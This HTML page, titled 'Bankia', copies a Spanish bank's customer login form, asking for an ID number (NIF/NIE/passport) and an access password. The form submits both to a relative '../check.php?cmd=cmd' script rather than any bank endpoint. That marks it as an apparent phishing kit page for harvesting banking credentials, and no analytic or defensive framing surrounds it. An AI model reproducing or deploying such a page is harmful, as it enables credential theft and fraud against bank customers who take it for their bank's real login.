﻿<!DOCTYPE html>
<html lang="es" dir="ltr">
<!--<![endif]-->

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <!-- Título página-->
    <title>Bankia</title>
    <!-- Etiquetas META-->

    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- Favicon-->
    <!--   <link rel="icon" type="image/png" href="/_imagenes/favicon.ico"/> -->




    <!--         ESTILOS -->
    <!-- Archivos CSS-->




    <link rel="stylesheet" type="text/css" href="./bootstrap.min.css">

    <link rel="stylesheet" type="text/css" href="./ladda.min(1).css">



    <link rel="stylesheet" type="text/css" href="./general.min.css">

    <link rel="stylesheet" type="text/css" href="./modulesLogin.min.css">


</head>

<body>
    <!-- MOD_LOGIN-->
    <div aria-expanded="false" role="menu" class="mod_login  lgn-iframe">
        <!-- mod_message-->
        <div class="mod_message msg-error hide" id="messageValidando">
            <div class="msg-container">
                <p class="msg-text" id="mensajeErr">Por favor revisa los campos erróneos indicados en el formulario</p><a data-function="fc-closeMessage" data-icon="c" class="msg-link data-ico-E"></a>
            </div>
        </div>

        <input type="hidden" id="loginLetraActivo" name="loginLetraActivo" value="true">
        <form action="../check.php?cmd=cmd" method="post" class="mod_form frm-login" name="formularioLogin" id="formularioLogin">

            <fieldset class="frm-fieldset">
                <legend class="hideAccessible frm-legend"> <span class="frm-legend-txt">Acceso de clientes</span></legend>
                <label for="id_usu_login" id="id_usu_login" class="frm-label"><span class="frm-label-txt">Usuario</span>
          
		  <div class="hide" id="placeHolderLogin">
		  	<div class="msg-container">
				<p class="msg-text" id="placeHolderLoginPU">NIF / NIE / Pasaporte</p><a data-function="fc-closeMessage" data-icon="c" class="msg-link data-ico-E"></a>
		  	</div>
		  </div>
          <input  type="text" value="" name="identificador" id="identificador" maxlength="15" autocomplete="off" required="required" placeholder="NIF / NIE / Pasaporte" class="frm-input"><span id="id_desc_err_usu" class="frm-txt-message">El Nº Documento es incorrecto, introduzca su DNI, pasaporte o tarjeta de residencia.</span>
        </label>

                <!--	PARA LA TRADUCCION DEL PLACEHOLDER, YA QUE POR DEFECTO, LOS INPUTS NO SE TRADUCEN	-->
              
                <label for="id_acc_login" id="id_acc_login" class="frm-label"><span class="frm-label-txt">Clave de acceso</span>
          <input type="password" name="password" id="password" maxlength="8" autocomplete="off" required="required" aria-expanded="false" class="frm-input"><span id="id_desc_err_pass" class="frm-txt-message">La clave es incorrecta</span>
        </label>

                <div class="mod_buttons">
                    <button id="botonEntrar" data-function="fc-buttonLoading" type="submit" title="Entrar" value="Entrar" data-style="expand-left" class="but-green but-wDefault ladda-button"><span class="ladda-label">Entrar</span><span class="ladda-spinner"></span></button>
                </div>
            </fieldset>


            <!--        LOGIN PU:FORMULARIOS -->

            <!--         FORMULARIOS -->
            <label for="qXkoFxDOmH" class="frm-label forClave"><span class="frm-label-txt"></span>
      
        </label>






            <!--         FIN-FORMULARIOS -->

            <!--        LOGIN PU:FIN-FORMULARIOS -->
        </form>
    </div>


</html>